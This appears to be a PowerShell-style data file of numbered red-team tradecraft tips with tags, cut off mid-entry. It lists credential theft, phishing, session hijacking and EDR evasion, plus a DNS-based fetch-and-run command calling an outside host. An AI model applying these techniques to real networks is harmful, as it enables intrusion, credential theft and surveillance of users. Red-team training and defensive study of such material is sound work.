%(tips => 'Red tip #10: When using BloodHound, dont forget DA equivalents such as administrators and server operators etc too. These arent mapped.', tags => @(
'redtip', '#10', 'BloodHound', 'DA', 'groups', 'mapping'
)
),
%(tips => 'Red tip #11: When navigating mature environments, a good old network diagram along with AD OUs can help to shed some light into next steps.', tags => @(
'redtip', '#11', 'topology', 'network', 'AD', 'OU', 'lateral movement'
)
),
%(tips => 'Red tip #12: Kerberoast them hashes, could be a fast route to domain administrator. PowerView: Invoke-Kerberoast -Format Hashcat', tags => @(
'redtip', '#12', 'Kerberoast', 'hashes', 'services', 'powershell', 'DA'
)
),
%(tips => 'Red tip #13: Shared local administrator account hashes are great for lateral movement. Find machines based on the same build and attack away', tags => @(
'redtip', '#13', 'administrator', 'account', 'hashes', 'lateral movement', 'machines'
)
),
%(tips => 'Red tip #14: Got extra credentials? Use different sets for separate egress channels so that if one account is disabled all the rest are ok.', tags => @(
'redtip', '#14', 'credentials', 'egress', 'channels', 'account'
)
),
%(tips => 'Red tip #15: You dont need payloads when you can phish credentials and login to Citrix, VPN, email with no 2FA. Check the perimeter.', tags => @(
'redtip', '#15', 'phish', 'payload', 'Citrix', 'VPN', 'email'
)
),
%(tips => 'Red tip #16: @dafthack MailSniper, @domchell LyncSniper can be a useful but noisy way to obtain AD credentials into an organization.', tags => @(
'redtip', '#16', 'AD', 'credentials', 'organization'
)
),
%(tips => 'Red tip #17: @_staaldraad Ruler tool can be used to obtain code execution on a system running Outlook if you can access exchange externally', tags => @(
'redtip', '#17', 'Ruler', 'Outlook', 'code', 'execution', 'exchange'
)
),
%(tips => 'Red tip #18: When tools like MailSniper dont work in custom environments, you still have good old @Burp_Suite to replicate the attacks', tags => @(
'redtip', '#18', 'burpsuite', 'burp', 'MailSniper'
)
),
%(tips => 'Red tip #19: Need a DC? echo %LOGONSERVER%. Need a list? nltest /dclist, nslookup -q=srv _kerberos._tcp (domain suffix can autocomplete)', tags => @(
'redtip', '#19', 'DC', 'LOGONSERVER', 'nltest', 'nslookup', 'kerberos'
)
),
%(tips => 'Red tip #20: So apparently not many people use SSH for redirector setup. So try out SSH c2 -R *:80:localhost:80. SSH config GatewayPorts yes', tags => @(
'redtip', '#20', 'SSH', 'redirector', 'c2', 'config'
)
),
%(tips => 'Red tip #21: Found open user home shares that are accessible? See if you can drop into Startup Programs for lateral movement and privesc.', tags => @(
'redtip', '#21', 'shares', 'user', 'startup', 'privesc', 'lateral movement'
)
),
%(tips => 'Red tip #22: Use VNC, microphone and webcam to perform surveillance. Netstat, tasklist can provide context into what the users doing.', tags => @(
'redtip', '#22', 'VNC', 'microphone', 'webcam', 'netstat', 'tasklist'
)
),
%(tips => 'Red tip #23: Stash payloads in C:$Recycle.Bin', tags => @(
'redtip', '#23', 'payload', 'C:', 'Recycle Bin'
)
),
%(tips => 'Red tip #24: Compromise the SOC and Security teams to watch their progress and track their email alerts for sophisticated threats', tags => @(
'redtip', '#24', 'SOC', 'Security', 'email', 'phish', 'alerts'
)
),
%(tips => 'Red tip #25: Probably dont do this on a red team, but spray for Welcome1, Password1 if youre struggling to move. But move off fast.', tags => @(
'redtip', '#25', 'password', 'spray', 'cracking'
)
),
%(tips => 'Red tip #26: Split your campaigns up so that they are independent. Fire tons at once for decoys and to burn out the defense.', tags => @(
'redtip', '#26', 'campaign', 'fire', 'defense'
)
),
%(tips => 'Red tip #27: Need more credentials? Search for passwords on Sharepoint, and intranet.', tags => @(
'redtip', '#27', 'credentials', 'password', 'Sharepoint', 'intranet'
)
),
%(tips => 'Red tip #28: Look for asset registers to understand who owns what machine, make and model. Theres usually an asset label to host name too!', tags => @(
'redtip', '#28', 'asset', 'machine', 'host'
)
),
%(tips => 'Red tip #29: Lateral movement: printers, open webroots, good old Tomcat, what are your quick wins?', tags => @(
'redtip', '#29', 'lateral movement', 'printers', 'webroots', 'tomcat'
)
),
%(tips => 'Red tip #30: Get AD credentials? Turn up on site and you might be able to use them to login to Corporate Wifi :)', tags => @(
'redtip', '#30', 'AD', 'credentials', 'site', 'login', 'wifi'
)
),
%(tips => 'Red tip #31: Hunting e-mails and network shares for penetration testing reports can often yield good results.', tags => @(
'redtip', '#31', 'emails', 'network', 'shares', 'reports'
)
),
%(tips => 'Red tip #32: List mounts: net use, look for shared folders and drop a UNC icon LNK into it. Run Inveigh or Wireshark on host to grab hashes.', tags => @(
'redtip', '#32', 'mount', 'list', 'net', 'shared', 'folders', 'LNK', 'Inveigh', 'Wireshark'
)
),
%(tips => 'Red tip #33: Orgs are transitioning to cloud services such as AWS, Beanstalk, O365, Google Apps. 2FA is vital - password reset to compromise.', tags => @(
'redtip', '#33', 'cloud', 'services', 'AWS', 'O365', 'password', 'Apps'
)
),
%(tips => 'Red tip #34: OpSec. Set notifications to your phone for logins or intrusion attempts in any part of your attack infrastructure.', tags => @(
'redtip', '#34', 'Opsec', 'notification', 'phone', 'login', 'infrastructure'
)
),
%(tips => 'Red tip #35: FireEye sandbox flagging your payloads? Try anti sandbox techniques! If not, just use HTA to get into memory as it doesnt scan', tags => @(
'redtip', '#35', 'FireEye', 'sandbox', 'payload', 'HTA', 'memory'
)
),
%(tips => 'Red tip #36: Dont forget the good old GPP passwords in SYSVOL. There may be cached GPP on the machine. Applying the patch isnt enough', tags => @(
'redtip', '#37', 'GPP', 'password', 'SYSVOL', 'machine', 'patch'
)
),
%(tips => 'Red tip #37: Use GenHTA to generate HTA files that use anti-sandboxing techniques. https://github.com/vysec/GenHTA', tags => @(
'redtip', '#37', 'GenHTA', 'HTA', 'files', 'sandbox'
)
),
%(tips => 'Red tip #38: Having trouble getting @armitagehacker CobaltStrikes evil.hta through defenses? https://github.com/vysec/MorphHTA', tags => @(
'redtip', '#38', 'CobaltStrike', 'HTA', 'morphHTA'
)
),
%(tips => 'Red tip #39: If emails get bounced, read the email! Sometimes due to malware scanners, spam etc. Or you may even get an out of office reply.', tags => @(
'redtip', '#39', 'email', 'malware', 'scanner', 'spam'
)
),
%(tips => 'Red tip #40: @0x09AL suggests looking for default credentials on printers and embedded devices. Move off initial foothold using this.', tags => @(
'redtip', '#40', 'credentials', 'printers', 'devices', 'foothold'
)
),
%(tips => 'Red tip #41: @Oddvarmoe suggests using Alternate Data Streams if you need to put a file on disk. For example https://github.com/samratashok/nishang/blob/master/Backdoors/Invoke-ADSBackdoor.ps1', tags => @(
'redtip', '#41', 'ADS', 'Data', 'Streams', 'file', 'disk'
)
),
%(tips => 'Red tip #42: Got OS level access to a middle tier? Task list, netstat and wmic process list full | findstr /I commandline for more ideas!', tags => @(
'redtip', '#42', 'OS', 'access', 'tier', 'wmic', 'process', 'list', 'findstr'
)
),
%(tips => 'Red tip #43: So you know where the server application files are. Download the binaries and check out configuration files for conn. strings', tags => @(
'redtip', '#43', 'server', 'files', 'application', 'binaries', 'config'
)
),
%(tips => 'Red tip #44: Run PEiD and other packer / technology checkers to find out the language and packer used on downloaded server binaries.', tags => @(
'redtip', 'PEiD', 'packer', 'language', 'binaries'
)
),
%(tips => 'Red tip #45: Run strings on the application binary for potentially other cleartext sensitive strings! (Unicode mode too)', tags => @(
'redtip', '#45', 'strings', 'application', 'binary', 'cleartext'
)
),
%(tips => 'Red tip #46: On a VDI? Check out C:\ and other disks for potentially sensitive files other users may have saved there.', tags => @(
'redtip', '#46', 'VDI', 'C:', 'disks', 'sensitive', 'files'
)
),
%(tips => 'Red tip #47: Incase EDR are looking for "net users /domain" try using "net use /dom"', tags => @(
'redtip', '#47', 'EDR', 'net', 'users', 'domain', 'dom'
)
),
%(tips => 'Red tip #48: Is EDR potentially looking for "powershell -encodedcommand"? Try "powershell -ec"', tags => @(
'redtip', '#48', 'EDR', 'powershell', 'encoded', 'command'
)
),
%(tips => 'Red tip #49: Attacking a heavy Macintosh or Linux estate? Send a Office Maldoc with OS checking logic to obtain footholds on either system', tags => @(
'redtip', '#49', 'Mac', 'linux', 'Office', 'OS', 'foothold'
)
),
%(tips => 'Red tip #50: Carbon Black checks for IEX and web req commands. Use powershell "powershell . (nslookup -q=txt calc.vincentyiu.co.uk )[-1]"', tags => @(
'redtip', '#50', 'Carbon Black', 'IEX', 'web', 'powershell'
)
),
%(tips => 'Red tip #51: Cant open C drive? Try \127.0.0.1\c$', tags => @(
'redtip', '#51', 'C:', '127.0.0.1', 'c$'
)
),
%(tips => 'Red tip #52: SC doesnt take credentials. Cant use runas? Try net use \targetip\ipc$ password /u:domain\username then sc to psexec', tags => @(
'redtip', '#52', 'SC', 'credentials', 'runas', 'target', 'ip', 'password', 'domain', 'psexec'
)
),
%(tips => 'Red tip #53: When stick phishing for 2FA, consider using @mrgretzky Evilginx project which logs cookies. https://breakdev.org/evilginx-1-1-release/', tags => @(
'redtip', '#53', 'phishing', 'evilginx', 'logs', 'cookies'
)
),
%(tips => 'Red tip #54: Hide from blue. Volume shadow copy then execute \?\GLOBALROOT\Device\HarddiskVolumeShadowColy1\malware.exe/dll then delete VSC', tags => @(
'redtip', '#54', 'hidden', 'VSS', 'shadow', 'copy', 'execute', 'VSC'
)
),
%(tips => 'Red tip #55: SMB hash leaking using a UNC path for image in page for drive by leak can give you credentials for less mature environments.', tags => @(
'redtip', '#55', 'SMB', 'hash', 'UNC', 'credentials'
)
),
%(tips => 'Red tip #56: Target victims using email authentication such as Microsoft Account on Windows 10? Hash leak exposes full email address!', tags => @(
'redtip', '#56', 'target', 'email', 'authentication', 'microsoft', 'windows'
)
),
%(tips => 'Red tip #57: Working in teams yields better results; and best of all Makes Offensive operations more fun and keeps the adrenaline pumping', tags => @(
'redtip', '#57', 'team', 'operations', 'red'
)
),
%(tips => 'Red tip #58: Discuss business targets and objectives with your clients. This process should set non technical goals such as "ATM spit money"', tags => @(
'redtip', '#58', 'business', 'targets', 'objectives', 'client', 'goals'
)
),
%(tips => 'Red tip #59: Checking whether a server or host is good for egress? Likely to go down? "systeminfo | findstr /i boot"', tags => @(
'redtip', '#59', 'server', 'host', 'egree', 'systeminfo'
)
),
%(tips => 'Red tip #60: Type "query user" to see who else is connected to the machine.', tags => @(
'redtip', '#60', 'query', 'user', 'machine'
)
),
%(tips => 'Red tip #61: Get a quick patch list using wmic qfe list brief. Cross ref KB to bulletins.', tags => @(
'redtip', '#61', 'patch', 'wmic', 'qfe', 'KB'
)
),
%(tips => 'Red tip #62: Found a process of interest? Dont forget to obtain a MiniDump! Use Out-MiniDump https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1', tags => @(
'redtip', '#62', 'process', 'Minidump', 'powershell'
)
),
%(tips => 'Red tip #63: Finally in CyberArk, click policies and see safes but no account? Go to accounts search and search for empty and safes show up', tags => @(
'redtip', '#63', 'CyberArk', 'policies', 'account'
)
),
%(tips => 'Red tip #64: Is WebDav allowed through the gateway? Using http mini redirector? Dont exfiltrate or send in files. WebDav is subject to DLP', tags => @(
'redtip', '#64', 'webdav', 'gateway', 'http', 'redirector', 'DLP'
)
),
%(tips => 'Red tip #65: WebDav mini http redirector: net use * http://totallylegit.com/share . Then start z:', tags => @(
'redtip', '#65', 'webdav', 'mini', 'http', 'redirector'
)
),
%(tips => 'Red tip #66: Found potential MQ creds? ActiveMQ? Try out https://github.com/fmtn/a , works to query MQ endpoints that dont use self signed crt', tags => @(
'redtip', '#66', 'MQ', 'credentials', 'endpoints', 'crt'
)
),
%(tips => 'Red tip #67: Use vssadmin to list and create volume shadow copies', tags => @(
'redtip', '#67', 'vssadmin', 'list', 'volume', 'shadow'
)
),
%(tips => 'Red tip #68: Pivoting into a secure zone that has no DNS or web gateway and need exfil? Netsh port forward pivot UDP 53 to DNS 53 then boom', tags => @(
'redtip', '#68', 'pivot', 'DNS', 'web', 'gateway', 'UDP', 'exfil'
)
),
%(tips => 'Red tip #69: Have blue hidden the ways including winkey+R? Try shift and right click desktop and open command prompt', tags => @(
'redtip', '#69', 'hidden', 'blue', 'winkey', 'command', 'prompt'
)
),
%(tips => 'Red tip #70: Tracked down that putty session? Popped the box? Query user and check the victims logon time and idle times', tags => @(
'redtip', '#70', 'putty', 'session', 'Query', 'user', 'logon', 'time'
)
),
%(tips => 'Red tip #71: Hijack his Session using sc create sesshijack binpath= "cmd.exe /k tscon /dest:" then use putty session', tags => @(
'redtip', '#71', 'session', 'sc', 'hijack', 'putty', 'cmd.exe'
)
),
%(tips => 'Red tip #72: Most people understand email sec wrong. SPF does not mean not spoofable. SPF does nothing without DMARC.', tags => @(
'redtip', '#72', 'email', 'SPF', 'DMARC'
)
),
%(tips => 'Red tip #73: Weak DMARC on victim org domain? Spoof their own emails back into themselves! You even inherit their AD name and photo', tags => @(
'redtip', '#73', 'DMARC', 'domain', 'spoof', 'emails', 'AD'
)
),
%(tips => 'Red tip #74: Got access to Microsoft OWA mailbox or O365? You can extract global catalog from contacts use @Burp_Suite and parse JSON object', tags => @(
'redtip', '#74', 'access', 'microsoft', 'OWA', 'mailbox', 'O365', 'burpsuite'
)
),
%(tips => 'Red tip #75: Write PHP delivery scripts that can mutate your payloads and add unique trackers per download. This tracks file being executed', tags => @(
'redtip', '#75', 'PHP', 'delivery', 'scripts', 'payload', 'download', 'files'
)
),
%(tips => 'Red tip #76: Simulating a criminal threat story with smash and grab agenda? Phish users and hot swap payload mid campaign to test formats', tags => @(
'redtip', '#76', 'criminal', 'agenda', 'phish', 'users', 'campaign'
)
),
%(tips => 'Red tip #77: RCE on a web application for less mature client? nslookup -q=srv _ldap._tcp if its domain joined Invoke-Kerberoast', tags => @(
'redtip', '#77', 'RCE', 'web', 'application', 'client', 'nslookup', 'domain', 'kerberoast'
)
),
%(tips => 'Red tip #78: @benichmt1 suggests looking for vmdk files across the network. You can use this to potentially access segregated networks', tags => @(
'redtip', '#78', 'vmdk', 'files', 'network', 'access'
)
),
%(tips => 'Red tip #79: Obfuscation is never bad, especially when its a button click. @danielhbohannon - https://github.com/danielbohannon', tags => @(
'redtip', '#79', 'Obfuscation', 'danielbohannon'
)
),
%(tips => 'Red tip #80: Need to sweep for uptimes? Use wmic /node:"" OS get LastBootUpTime in a for loop', tags => @(
'redtip', '#80', 'uptime', 'wmic', 'OS'
)
),
%(tips => 'Red tip #81: Looking for systems running KeePass? Run a for loop on wmic /node:"host" process list brief :) then look at RT #82', tags => @(
'redtip', '#81', 'sytems', 'KeePass', 'wmic', 'host', 'process', 'list'
)
),
%(tips => 'Red tip #82: Found KeePass running in memory? Use @harmj0y KeeThief to extract password and dl the KDBX - https://github.com/HarmJ0y/KeeThief', tags => @(
'redtip', '#82', 'KeePass', 'memory', 'harmj0y', 'KeeThief', 'password'
)
),
%(tips => 'Red tip #83: Struggling to find a working DB client? Live off the land and use your victims in an RDP session.', tags => @(
'redtip', '#83', 'DB', 'client', 'RDP', 'session'
)
),
%(tips => 'Red tip #84: Im sure everyone hates Oracle DB but no sweat, you can proxycap sqldeveloper.exe', tags => @(
'redtip', '#84', 'Oracle', 'DB', 'proxycap', 'sql'
)
),
%(tips => 'Red tip #85: Check the users calendars before using persistence on their machine. They may be out of office and screw your master plans.', tags => @(
'redtip', '#85', 'users', 'calendars', 'persistence', 'machine', 'office'
)
),
%(tips => 'Red tip #86: Red team and attack simulation is not penetration testing. You shouldnt be really testing anything, but simply infiltrating.', tags => @(
'redtip', '#86', 'red team', 'attack', 'testing', 'penetration'
)
),
%(tips => 'Red tip #87: @Oddvarmoe uses .UDL files to quickly launch a MSSQL connection test to validate credentials! https://blogs.msdn.microsoft.com/farukcelik/2007/12/31/basics-first-udl-test/', tags => @(
'redtip', '#87', 'UDL', 'files', 'MSSQL', 'credentials'
)
),
%(tips => 'Red tip #88: Dont forget Physical security! Whip up a PI with GSM and you can hack your way in by dropping the PI on network.', tags => @(
'redtip', '#88', 'Physical', 'security', 'PI', 'GSM', 'network'
)
),
%(tips => 'Red tip #89: regsvr32 SCT files are being detected as Squigglydoo. Looks for "script" case sensitive and "<registration" case insensitive.', tags => @(
'redtip', '#89', 'regsvr32', 'SCT', 'files', 'squigglydoo', 'script'
)
),
%(tips => 'Red tip #90: Cisco NGIPS is shit, when analysing traffic for havex it drops only but not', tags => @(
'redtip', '#90', 'Cisco', 'NGIPS', 'traffic', 'analysis'
)
),
%(tips => 'Red tip #91: Decoys can be as simple as burning egress by port scanning 1-1024 through IDS, or spamming dodgy emails at blocks of employees', tags => @(
'redtip', '#91', 'egress', 'port', 'scanning', 'IDS', 'emails'
)
),
%(tips => 'Red tip #92: If WDigest is disabled, reenable it for cleartext credentials before new users login with @harmj0y https://github.com/HarmJ0y/Misc-PowerShell/blob/master/Invoke-WdigestDowngrade.ps1', tags => @(
'redtip', '#92', 'wdigest', 'credentials', 'login'
)
),
%(tips => 'Red tip #93: Use Empyre to generate Macintosh and Linux payloads, modify it to contain code for Windows too! https://github.com/EmpireProject/EmPyre', tags => @(
'redtip', '#93', 'Empire', 'MAC', 'linux', 'payload', 'Empyre'
)
),
%(tips => 'Red tip #94: Client uses VDIs? Compromise underlying host and use Citrix Shadow Taskbar to spy on VDI sessions by selecting username', tags => @(
'redtip', '#94', 'VDI', 'Citrix', 'host'
)
),
%(tips => 'Red tip #95: @domchell recommends avoiding non persistent VDIs and persist on laptops. Query DC for live laptops.', tags => @(
'redtip', '#95', 'VDI', 'persistence', 'DC', 'laptop'
)
),
%(tips => 'Red tip #96: @lucasgates recommends using OLE objects containing VBS scripts instead of Macros as less suspicious. VBE will work too', tags => @(
'redtip', '#96', 'OLE', 'VBS', 'scripts', 'Macros', 'VBE'
)
),
%(tips => 'Red tip #97: Use recent critical vulnerabilities such as CVE-2017-0199 HTA handler issue to simulate real threats. https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/', tags => @(
'redtip', '#97', 'vulnerabilities', 'CVE', 'HTA'
)
),
%(tips => 'Red tip #98: @0x09AL suggests WordSteal. You can embed an IMAGE with UNC path to steal hashes from Word. Wont work if proxy. https://github.com/0x09AL/WordSteal', tags => @(
'redtip', '#98', 'WordSteal', 'image', 'UNC', 'word'
)
),
%(tips => 'Red tip #99: If client is using Proxy with WebDav you can phish creds using @ryHanson Phishery https://github.com/ryhanson/phishery', tags => @(
'redtip', '#99', 'client', 'Proxy', 'WebDav', 'phish', 'creds'
)
),
%(tips => 'Red tip #100: Use wgsidav if you need a quick WebDav server :) https://github.com/mar10/wsgidav', tags => @(
'redtip', '#100', 'wgsidav', 'webdav', 'server'
)
),
%(tips => 'Red tip #101: Set up red team infrastructure following @bluscreenofjeff guidelines! https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki', tags => @(
'redtip', '#101', 'red team', 'infrastructure', 'jeff', 'wiki'
)
),
%(tips => 'Red tip #102: Easier DNS redirector! https://pastebin.com/LNj4zjFs for opsec and not hosting C2 on the cloud', tags => @(
'redtip', '#102', 'DNS', 'redirector', 'opsec', 'c2'
)
),
%(tips => 'Red tip #103: Red team tips are useful but what makes the good red teamer is experience. Rack up that breadth of experience', tags => @(
'redtip', '#103', 'experience', 'tips'
)
),
%(tips => 'Red tip #104: SessionGopher does a decent job at retrieving putty and RDP history - https://github.com/fireeye/SessionGopher', tags => @(
'redtip', '#104', 'SessionGopher', 'putty', 'RDP', 'history'
)
),
%(tips => 'Red tip #105: If ping 8.8.8.8 works, try ICMP tunneling. More info at http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-5.html?m=1 from @fragsh3ll though only on immature network', tags => @(
'redtip', '#105', 'ping', 'ICMP', 'tunneling'
)
),
%(tips => 'Red tip #106: Wordlists? https://github.com/berzerk0/Probable-WordlistsI like to use the top probable 297 million list with Deadhobo rules', tags => @(
'redtip', '#106', 'Wordlists', 'rules', 'list'
)
),
%(tips => 'Red tip #107: More of a pentest tip but nslookup http://google.com if it resolves you may have a DNS tunneling problem.', tags => @(
'redtip', '#017', 'pentest', 'nslookup', 'DNS', 'tunneling'
)
),
%(tips => 'Red tip #108: Post exploitation Asset Discovery https://github.com/vysec/Invoke-DNSDiscovery looks for assets by name that might be good if youre low priv user.', tags => @(
'redtip', '#108', 'exploitation', 'asset', 'DNS', 'user'
)
),
%(tips => 'Red tip #109: Use Invoke-ProcessScan to give some running processes context on a system. This uses EQGRP leaked list- https://github.com/vysec/Invoke-ProcessScan', tags => @(
'redtip', '#109', 'process', 'scan', 'EQGRP'
)
),
%(tips => 'Red tip #110: Mature blue? Be careful and minidump lssas.exe then download it and parse locally', tags => @(
'redtip', '#110', 'mature', 'blue', 'minidump', 'lssas'
)
),
%(tips => 'Red tip #111: Found an exploitable S4U condition? Use Mistique to attack! https://github.com/machosec/Mystique/blob/master/Mystique.ps1', tags => @(
'redtip', '#111', 'S4U', 'Mistique'
)
),
%(tips => 'Red tip #112: Need to use VNC as RDP in use? https://github.com/artkond/Invoke-Vnc has been pretty stable for me. Run it then pivot in and connect!', tags => @(
'redtip', '#112', 'VNC', 'RDP', 'pivot'
)
),
%(tips => 'Red tip #113: Found super secret.doc or master password database.xlsx? Use office2john to get hash and crack in Hashcat!', tags => @(
'redtip', '#113', 'password', 'database', 'xlsx', 'hashcat'
)
),
%(tips => 'Red tip #114: PowerUp didnt work and you want to autoruns? Dont bother going on disk, use Invoke-AutoRuns to csv- https://github.com/p0w3rsh3ll/AutoRuns', tags => @(
'redtip', '#114', 'PowerUp', 'autoruns', 'powershell'
)
),
%(tips => 'Red tip #115: Need to zip up a directory quickly for easy exfiltration? Eg. Home shares https://github.com/thoemmi/7Zip4Powershell use Powershell', tags => @(
'redtip', '#115', 'zip', 'exfil', 'powershell'
)
),
%(tips => 'Red tip #116: Use CatMyFish to search for categorised domains that could be used in your engagements - https://github.com/Mr-Un1k0d3r/CatMyFish', tags => @(
'redtip', '#116', 'CatMyFish', 'domains', 'engagements'
)
),
%(tips => 'Red tip #117: Ran Invoke-MapDomainTrusts from PowerView? Use @harmj0y DomainTrustExplorer to generate a graph - https://github.com/sixdub/DomainTrustExplorer', tags => @(
'redtip', '#117', 'PowerView', 'domain', 'trust', 'graph'
)
),
%(tips => 'Red tip #118: FOCA finds some useful information for OSINT and intelligence phases. https://www.elevenpaths.com/labstools/foca/index.html', tags => @(
'redtip', '#118', 'FOCA', 'OSINT', 'intelligence'
)
),
%(tips => 'Red tip #119: GoPhish is a pretty useful tool for spinning up simple phishing campaigns especially for decoys https://getgophish.com', tags => @(
'redtip', '#119', 'GoPhish', 'tool', 'phishing', 'email', 'campaigns'
)
),
%(tips => 'Red tip #120: If you have write access to the orgs shared Office template folders You can privesc by backdooring these trusted documents.', tags => @(
'redtip', '#120', '', '', ''
)
),
%(tips => 'Red tip #121: @zwned uses netsh packet tracing to sniff natively from victim host. Save capture and analyze offline!', tags => @(
'redtip', '#121', 'netsh', 'packet', 'sniff', 'capture'
)
),
%(tips => 'Red tip #122: More decoy tips! Scan the external perimeter with tools like Nessus and OpenVAS. More traffic the better just to burn the blue', tags => @(
'redtip', '#122', 'decoy', 'external', 'perimeter', 'Nessus', 'OpenVAS'